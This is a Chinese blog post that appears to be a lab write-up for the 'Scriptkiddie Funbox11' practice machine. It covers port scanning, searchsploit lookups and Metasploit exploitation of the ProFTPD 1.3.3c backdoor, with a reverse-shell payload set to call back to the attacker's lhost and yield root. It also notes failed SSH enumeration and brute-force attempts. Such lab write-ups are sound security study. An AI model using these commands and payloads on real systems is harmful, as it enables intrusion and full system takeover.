首页 > 其他分享 >靶机Scriptkiddie Funbox11 学习总结

靶机Scriptkiddie Funbox11 学习总结

时间:2023-09-17 22:02:15浏览次数:50  
标签:Funbox11 proftpd 端口 192.168 exploit Scriptkiddie exploits 靶机 payload

一、信息收集:

1、 扫描ARP信息:

└─# arp-scan –l

靶机Scriptkiddie Funbox11 学习总结_proftpd

2、 使用nmap扫描端口,-sC使用默认脚本进行漏洞扫描:

└─# nmap -sC -sV -oA nmap/funbox 192.168.2.23

靶机Scriptkiddie Funbox11 学习总结_proftpd_02

再扫描一下版本:

靶机Scriptkiddie Funbox11 学习总结_funbox11_03

通过上面的信息可以看到:

(1)   系统为ubuntu,但是具体的版本不确定

(2)   系统开放了21端口,运行的软件为proftpd,版本为1.3.3c

(3)   系统开放了22端口,OpenSSH 7.2p2

(4)   系统开放了80端口,运行的是wordpress

(5)   系统还开放了110/139/143/445等端口。

3、 搜索是否有proftpd相关的漏洞

└─# searchsploit proftpd 1.3.3c

靶机Scriptkiddie Funbox11 学习总结_proftpd_04

看到上面有两个结果,其中第2个为ruby脚本,可以直接利用。

二、漏洞利用

1、 现在进入msfconsole,查看一下:

msf6 > search proftpd

靶机Scriptkiddie Funbox11 学习总结_scriptkiddie_05

上面可以看到第5个:exploit/unit/ftp/proftpd_133c_backdoor.

靶机Scriptkiddie Funbox11 学习总结_funbox11_06

先run一下,看到报错:[-] 192.168.2.23:21 - Exploit failed: A payload has not been selected.提示没有payload

靶机Scriptkiddie Funbox11 学习总结_proftpd_07

2、 查看当前可以使用的payload:

show payloads

靶机Scriptkiddie Funbox11 学习总结_scriptkiddie_08

这里看到有8个payload可以使用,可以挨个测试一下,可以看到只有第4个可以使用

3、 使用cmd/unix/reverse 作为payload:

靶机Scriptkiddie Funbox11 学习总结_proftpd_09

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > set lhost 192.168.2.20

lhost => 192.168.2.20

4、 使用exploit –j进行利用:

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > exploit –j

靶机Scriptkiddie Funbox11 学习总结_proftpd_10

5、 获取shell,查看当前用户已经为root权限

靶机Scriptkiddie Funbox11 学习总结_proftpd_11

三、靶机中的坑

这套靶机虽然比较简单,但是坑比较多,在学习的过程中遇到以下的问题:

1、 ProFtp适用的payload比较多,最开始测试了一下,没有连接就放弃了,然后进入更坑的地方;

2、 前面信息收集中发现一堆的端口及服务,OpenSSH发现有一个用户名枚举的漏洞:

靶机Scriptkiddie Funbox11 学习总结_funbox11_12

经过测试无结果:

└─# python3 40136.py -e -U /home/kali/Desktop/tool/fuzz/dic/username.txt 192.168.2.23

靶机Scriptkiddie Funbox11 学习总结_funbox11_13

3、 对FTP、SSH端口进行爆破,尝试半天没有结果

4、 80端口可以访问,在测试中发现有输入框,注意根据提示修改hosts文件进行域名解析,但是经过测试未发现信息

靶机Scriptkiddie Funbox11 学习总结_proftpd_14

5、 80端口运行的是wordpress,使用wpscan进行扫描,发现xmlrpc.php文件

靶机Scriptkiddie Funbox11 学习总结_proftpd_15

6、 网上查询可能可以利用,浏览器访问,但是需要修改为POST

靶机Scriptkiddie Funbox11 学习总结_proftpd_16

然后根据网上的操作也无法利用。

四、MSF的其他记录

在前面通过searchsploit 搜索到有16921.rb这个文件,这个文件为ruby语言编写的文件,可作为msf的exploit模块使用,具体操作如下:

1、 将该文件拷贝至/usr/share/metasploit-framework/modules/exploits/目录下:

└─# cp /usr/share/exploitdb/exploits/linux/remote/16921.rb /usr/share/metasploit-framework/modules/exploits/.

└─# ll /usr/share/metasploit-framework/modules/exploits/16921.rb

-rwxr-xr-x 1 root root 1994 Sep 17 20:34 /usr/share/metasploit-framework/modules/exploits/16921.rb

 2、 在msfconsole下使用reload_all加载该模块,然后再查看一下,看到这个模块了

msf6 exploit(unix/ftp/proftpd_133c_backdoor) > reload_all

靶机Scriptkiddie Funbox11 学习总结_scriptkiddie_17

 

 

 

标签:Funbox11,proftpd,端口,192.168,exploit,Scriptkiddie,exploits,靶机,payload
From: https://blog.51cto.com/u_9652359/7504072

相关文章

  • 【vulnhub】——DC-9靶机
    【vulnhub】——DC-9靶机1.主机发现扫描kali主机C段(Kali和DC-9主机在同一个网关下):发现主机为192.168.108.146,进行详细端口扫描:可以看到靶机开了一个ssh和http服务。可以使用ssh弱密码爆破,但是可以看到22端口的状态是filter,这里先看web部分。2.SQL注入打开相应网页可以......
  • msf扫描靶机上mysql服务的空密码
    我们启动一台Metasploitable2-Linux靶机网络模式为桥接IP:192.168.146.136 登录 Metasploitable2-Linux 系统用户名 root,密码:123456 输入 ipa 查看 ip 地址 登录Kali开始搜索模块msf6>searchmysql_login加载模块msf6>useauxiliary/scanner/mysql/......
  • kali渗透win7靶机练习
    1.准备项目:装有kalilinux的虚拟机win7靶机2.查看一下kali和win7的ip:kali的IP为:192.168.164.129win7靶机的ip为:192.168.164.1873.将kali切换成root模式:4.用kali去ping一下win7靶机:如果ping不动,就要在win7里关掉防火墙(省略)5.启动Metasploit专用的数据库:msfc......
  • Vulnhub:Kira: CTF靶机
    kali:192.168.111.111靶机:192.168.111.238信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.238访问80端口点击upload发现是个上传点点击language发现存在文件包含上传php图片马再利用文件包含反弹shellhttp://192.168.111.238/languag......
  • Vulnhub: INO: 1.0.1靶机
    kali:192.168.111.111靶机:192.168.111.234信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.23480端口目录爆破gobusterdir-uhttp://192.168.111.234/lot-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt-xphp,bak,txt,......
  • Vulnhub: Inferno: 1.1靶机
    kali:192.168.111.111靶机:192.168.111.233信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.23380端口目录爆破gobusterdir-uhttp://192.168.111.233-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt-xphp,bak,txt,html......
  • Vulnhub: Hogwarts: Bellatrix靶机
    kali:192.168.111.111靶机:192.168.111.228信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.228访问80端口查看源码,提示ikilledsiriusblack.php和文件包含的参数名file漏洞利用ikilledsiriusblack.php存在文件包含http://192.168.111.228/......
  • Vulnhub: Ragnar Lothbrok: 1靶机
    kali:192.168.111.111靶机:192.168.111.226信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.226作者提示修改hosts文件目录爆破gobusterdir-uhttp://armbjorn-w/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt-xphp,ba......
  • 靶机jangow学习总结
    一、安装靶机下载:https://www.vulnhub.com/entry/jangow-101,754/下载后直接VMware打开启动,不过可能会出现没有获取到IP地址,导致后面扫半天也扫不出来信息的情况,可以百度一下,有很多解决办法。二、信息收集1.    ARP探测,看一下靶机获取的IP地址:#arp-scan-l2.    使用nma......
  • Vulnhub: DriftingBlues: 1靶机
    kali:192.168.111.111靶机:192.168.111.215信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.21580端口首页源码访问noteforkingfish.txt,发现为Ook!加密的密文解密后提示需要用户eric和修改hosts文件,解密网站:https://www.splitbrain.org/ser......